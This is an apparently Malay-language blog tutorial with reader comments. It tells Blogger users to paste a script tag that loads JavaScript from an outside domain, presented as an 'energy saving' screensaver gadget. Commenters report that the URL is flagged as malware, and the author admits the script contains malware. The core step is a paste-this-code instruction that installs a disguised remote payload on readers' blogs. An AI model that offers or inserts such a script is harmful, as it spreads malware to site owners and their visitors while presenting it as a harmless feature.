tutorial #3 :energy saving mode

mesti korang pelik kan ? hari ni belambak pulak aku post . HAHA ,.
ok ok .stop talking ! listen .korang tahu x energy saving mode tu ape ? ala ,yg kalau kau biarkan blog aku lelame smpai 5 minit or 3 t dye akan kuar bende warna hitam kan ? senang2 screensaver ,and kalau kau gerakkan cursor trus cm biase . ok .x payah la aku nk terang kan lagi k
1.pergi design > edit layout > add a gadjet > html javacript
2.paste kod kat bawah ni
<!-- save your energy -->
<script language='javascript' src='http://nikbir09.ws/scriptforenergy.js' type='text/javascript'/>
<!-- save your energy end --></script>


and paste kan dekat ruang html javascript tu

3.tekan save and cuba laa tngok apa hasil nya
kod ni aku da lupa aku amik kat sape ,so x tahu nk kredit kt sape ,sesiapa yg rase kod ni kod tuto dye ,sila laa beritahu ok ? peace

10 comments:

✿AiNnA✿ said...

kite dah berjaye wt ni.. hee :)thnx..^^
tp kan.. nk tnye.. kalau yg pasal boleh detect org view kite pernah dtg before ni or tak tu kan.. how?
and cmne nak wat atas tu,,yg oleh buat stu ruang for about. then next one linkies and then tutorial tu..cmne ye?

apitrawrr said...

@✿AiNnA✿oh . welcome . nanti apit buadd k :)

Dinie said...

nice , btw time kaseh . mcam mne nak buat cursor (blinkies ) ?

LuluBelle said...

apit ^^ thxx for the tutorial . dah jadi dahh :)

maisarah :) said...

thanks a bunch!

Farah Hanis said...

apa guna dia eh? save energy betul betul ke? haha :D

Anonymous said...

nape akak wat tak jadi erk?? dye kate url to virus malware....hurmmm

Syazana Najwa said...

Bende ni boleh harm my computer la..
macam mana ni ek /

Apit said...

@Syazana Najwaye . saving energy ni ada malware . so baik takpayah pakai , hhu

Nuur Khadijah said...

Camne nak buang malware tu ye?????sye syg blog sye tu.....

Subscribe